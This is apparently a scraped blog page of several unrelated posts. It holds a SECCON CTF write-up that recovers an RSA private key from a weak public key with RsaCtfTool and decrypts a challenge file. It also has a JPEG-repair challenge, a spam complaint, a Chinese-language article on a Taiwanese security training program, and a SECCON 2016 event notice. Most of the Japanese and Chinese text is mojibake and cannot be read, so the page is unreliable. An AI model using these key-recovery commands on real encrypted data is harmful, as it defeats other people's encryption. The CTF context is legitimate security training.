$ openssl rsa -in pub2.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:bb:33:cc:7f:cc:8e:ca:f3:bf:9e:d9:5c:58:37: 92:e1:ec:6b:80:ee:87:5e:c2:06:4d:bc:f0:75:95: c8:34:49:23:bf:53:65:24:d4:e0:a7:55:74:c7:79: (çç¥)
æå·æã²ãšã€ã«å¯ŸããŠããããå
¬ééµãµãã€ãæž¡ããŠããã®ãæ°ã«ãªããŸãããšæãã€ã€èª¿ã¹ãŠãããšãããªã®ãèŠã€ããŠããŸããŸããã
https://github.com/Ganapati/RsaCtfTool
RsaCtfTool RSA tool for ctf - uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key
äžç¬ã§çµäºãã©ãããŒã
$ ~/RsaCtfTool/RsaCtfTool.py âpublickey "*.pub" âprivate > private $ openssl rsautl -decrypt -inkey private -in cipher -out plain.txt $ cat plain.txt SECCON{1234567890ABCDEF}
flag㯠SECCON{1234567890ABCDEF}
JPEG file - Binary 100
å顿ã¯ã€ãã®ãšããã
Read this JPEG is broken. It will be fixed if you change somewhere by 1 bit.
ãã¡ã€ã«ãå£ããŠãããšèšã£ãŠããã®ã§ã修埩ããã°flagã衚瀺ããããšããããšã§ãããã
JPEG修埩ããŠããããšããããŒã«ãé©åœã«æ¢ããŠããŠå®è¡ããã ããæªãããªããŒã«ã ãšå°ãã®ã§ãããŒã«å®è¡åã«ã¹ãããã·ã§ããããšã£ãŠãããŠåŸã§æ»ããŠãããŸãããããããæã«ä»®æ³ãã·ã³ã¯äŸ¿å©ã§ãã
ãšãŠã楜ããã£ãã§ããSECCONã¯æ¯å¹Žæ¥œãã¿ã«ããŠããŠæ¬ ãããåå ããããã«ããŠããéèŠã€ãã³ãã§ããäºéžçªç Žã§ããã®ãããããã éå¶ã®ã¿ãªãããããŒã ã®ã¿ãªããããŸããã®ãããããªäººã«æè¬ã§ããããããšãããããŸããã
0 notes
Text
è¿·æã¡ãŒã«ãæ²æ»
ããŠã»ãã
è¿·æã¡ãŒã«ãæ¯æ¥200é以äžããŠããã
æè¿ã¯ãAmazonãæ¥œå€©ãåä¹ãè©æ¬ºã¡ãŒã«ãå€ãã
 SECCONãšã¯ãã»ãã¥ãªãã£ã®ã³ã³ãã¹ãã§ããã
ããŒã ããŒãžhttps://www.seccon.jp/2020/seccon/about.htmlã«ãããš
ãã
SECCONãšã¯ æ
å ±ã»ãã¥ãªãã£ãããŒãã«å€æ§ãªç«¶æãéå¬ããæ
å ±ã»ãã¥ãªãã£ã³ã³ãã¹ãã€ãã³ãã§ããå®è·µçæ
å ±ã»ãã¥ãªãã£äººæã®çºæã» è²æãæè¡ã®å®è·µã®å Žã®æäŸãç®çãšããŠèšç«ãããŸããã
ãSECCONã ã§ã¯ã«ã³ãã¡ã¬ã³ã¹ãã¯ãŒã¯ã·ã§ãããªã©ã®ã»ãã«ãæ»æã»é²åŸ¡äž¡è
ã®èŠç¹ãå«ãã»ãã¥ãªãã£ã®ç·ååã詊ããããã³ã°ã³ã³ãã¹ããCTF (Capture the Flag)ãããããããŒãã«ããããŠããã°ã©ã ãäœæããŠæ«é²ããããã°ã©ãã³ã°ã³ã³ãã¹ããããã«ãœã³ããªã©ããããŸãã
ãã
ãšã®ããšã§ããããã®ãªãã«ãããâŠ
View On WordPress
0 notes
Text
èºç£å¥œå²é§  éèŠè³å®æ°ç§åŽèµ·
åšæè²éšè³èšå®å
šäººæå¹è²èšç«çæšåèç¶è²»æ¯æäžïŒäŸèªå
šååå°å°è³èšå®å
šå
·åé«åºŠåžç¿èè¶£ç倧åžçåé«äžè·åžçïŒåŸ104幎éå§ïŒééè·šæ ¡ç倧åžåž«è³åäŸèªäŒæ¥çæ¥åž«å
±åæå°å¹è²ïŒææé¡¯èãåžçç衚çŸäžäœæ·±åäŒæ¥è®è³ïŒåšåé倧賜ç衚çŸä¹å¯åå¯é»ãäžäœå𿥿¬2017 SECCON CTF  for Girlsè³å®ç«¶è³œç²åŸç¬¬2ååªç°æçžŸïŒç±è·šæ ¡åžççµæçBFSæ°é æŽåšä»å¹Žãå
šçé§å®¢æ»é²å€§è³œ (DEFCON CTF)ãå
æç25åæ±ºè³œåžæ¬¡äžïŒååŸæ±ºè³œæ¬ïŒéæ¯æåæ·å¹ŽäŸéŠæ¬¡ååŸæ±ºè³œæ¬ç第2æ¯æ°éïŒæçºæåé å°çè³å®æ°è¡ã
éäºè¡šçŸåªç°çè³å®å°å
µå¹åŸæšæä¹äžïŒæ¯ç±åç«èºç£ç§æå€§åžãåç«èºç£å€§åžãåç«äº€é倧åžååŽå±±ç§æå€§åžçæ ¡çæåž«åå
±åçåæšåçæ°åæ
è³å®ææèª²çš(AIS3 )åãèºç£å¥œå²é§ãèšç«ãåè
ééäºåå
§å€å
·è³å®å¯Šåç¶é©çå°å®¶åè³å®å€§è³œåžžåéžæææç·Žæä»»è¬åž«ïŒåšæ¯å¹Žææé²è¡çºæ1åšçå¯éç ç¿èª²çšçå¹èšïŒåŸè
åé²äžæ¥éå°å
·æœåäžäž»ååžç¿åæ©é«çåžçåïŒç±å€§åžçæåž«ïŒçµååå
§ç±å¿æå
¥çè³å®äŒæ¥å°å®¶ïŒå
±åæä»»å°åž«(mentor)ïŒçµŠäºæ¯å±åžççºæ1幎çå¹è²æå°ã
AIS3åèºç£å¥œå²é§èšç«é©æ§å¹è²åžçå
Ό
·çè«è寊åæèœïŒäžäœæåžå¡åå©è¡æ¿é¢åšç¶²è·¯æ»é²å¯Šå
µæŒç·Žæä»»è³å®å°å
µïŒéšååžå¡æŽç²æ¥çå°åž«è¯å®ïŒåŸå°æ¥çå¯Šç¿æ©æïŒåžçå°éäºå¹è²ä¹æ·±èŠºåçè¯å€ãåŠé£çºå
©å¹Žç²éžåå ãèºç£å¥œå²é§ãå¹è²ãå³å°åšä»å¹Žç¢æ¥å°æçºå¥§çŸ©æºæ
§ç§ææ£åŒå¡å·¥ççŸ
ç
è³¢ååžå³è¡šç€ºïŒãèºç£å¥œå²é§èšç«äžçå°åž«åªåïŒäžåªäŸ·éåšèªå·±æåªåçå°åž«ïŒåªèŠåžå¡æèè¶£çé ååŠïŒéè調æ¥ãç¶²ç«å®å
šãäººå·¥æºæ
§çïŒéœå¯å該é åå°é·çæ¥åž«è«æïŒéæ¯èšç«çæå€§ç¹é»ïŒé€å€ïŒæå¹žè³åªåå°åž«çäŒæ¥(å¥§çŸ©æºæ
§)寊ç¿ïŒå¯Šç¿æéé²è¡ååŒäžåæ§è³ªçå°æ¡ïŒå¿«éåžæ¶é å°äŒæ¥æéèŠäºè§£çæè¡èç¥èïŒä¹å¯æ·±å
¥äºè§£èºç£ç¶äžçè³å®ç¢æ¥çæ³ïŒèéäºå°æ¡ç寊æ°ç¶é©åç¢æ¥çæ³ç¶é©éœæ¯ç¡æ³åŸåžæ ¡èª²çšäžæç²åŸçïŒèºç£å¥œå²é§å·²æåæçºåžçèäŒæ¥ä¹éçæ©æšïŒåŸæŠ®å¹žåšç¬¬1å±å第2å±åèå°åž«çå¹èšïŒç²åŸäžåªæ¯æè¡ïŒæŽæ¯ç¢æ¥ç¶é©ãã
æ¥è»ç¢åžååéäžçŽæ¯æè²éšãåžæ ¡åäŒæ¥æçºåªåçæ¹åïŒç¬¬2å±ãèºç£å¥œå²é§å¹èšææçŒè¡šæšç¢æ¥éçµäº€æµæãå³å°åš8æ24æ¥(ææäº)åšåç«èºç£ç§æå€§åžèè¡ïŒåžå¡é€å°çŒè¡š1幎äŸçåžç¿ææå€ïŒæäžäžŠéè«å¯éŠéæ§æçžè£å¯çžœç¶çäž»è¬ãéèç¢æ¥è³å®çŸæ³èè³å®äººæéæ±ãå104è³èšç§æå
¬åžè³èšæåçžœèé³åæè³å®é·å享ãè³å®ç¢æ¥çŸæ³èè³å®äººæéæ±ãïŒæè²éšæ¡è¿å°è³å®äººææéæ±çäŒæ¥ãæå°è³å®é åæèè¶£çåžçèèšåå ãïŒæŽ»å詳现è³èšè«è³è³èšå®å
šäººæå¹è²èšç«ç¶²ç«ïŒhttps://isip.moe.edu.tw/ïŒå ±åç¶²åïŒhttps://tinyurl.com/y76zoappïŒ
åèš»ïŒ 1. è³å®æ¶æç«¶è³œïŒCapture The Flag, CTFïŒïŒå©çšé»è
Šç§åžæè¡ïŒåŠç³»çµ±å®å
šãæŒç®æ³ãå¯ç¢Œåžãéåå·¥çšåçšåŒèšèšççè«ïŒäŸæš¡æ¬ç寊äžçè³å®æ»é²çž®åœ±ïŒééåéåäœæ¹åŒïŒéçšæ»æåé²å®çæèœïŒéå°å
¥äŸµå°æé»è
Šç³»çµ±ïŒååŸäŒºæåšäžçéé°ææå¹ãè§£é¡æ¯åžžèŠçæ¯è³œæš¡åŒä¹äžïŒéé¡ç«¶è³œåžžçšæŒå¹èšé«éè³å®äººæã 2. æ°åæ
è³å®ææèª²çšïŒAdvanced Information Security Summer School, AIS3ïŒæŽ»åå®ç¶²http://ais3.org
0 notes
Text
ãSECCON 2016ã1æ27ïœ29æ¥éå¬ãã»ãã¥ãªãã£ã³ã³ãã¹ã決å倧äŒ
#æ±äº¬éœè¶³ç«åºåäœæ²³åçºïŒïŒ 2017幎01æ20æ¥ 03:06:00 ã³ã³ãã¥ãŒã¿ãŒã»ãã¥ãªãã£æè¡ãç«¶ãæ¥æ¬æå€§èŠæš¡ã®CTFïŒCapture The FlagïŒå€§äŒãSECCON 2016ãã®æ±ºå倧äŒã1æ27ïœ29æ¥ã«æ±äº¬é»æ©å€§åŠæ±äº¬åäœãã£ã³ãã¹ïŒæ±äº¬éœè¶³ç«åºïŒã§éå¬ããããçŸåšãå
¬åŒãµã€ãã§æ¥å Žç»é²ãåãä»ããŠããã SECCON 2016ã®åäºéžã ... æ±äº¬éœè¶³ç«åºåäœæ²³åçºïŒïŒã®è¿æã®ããŒ
0 notes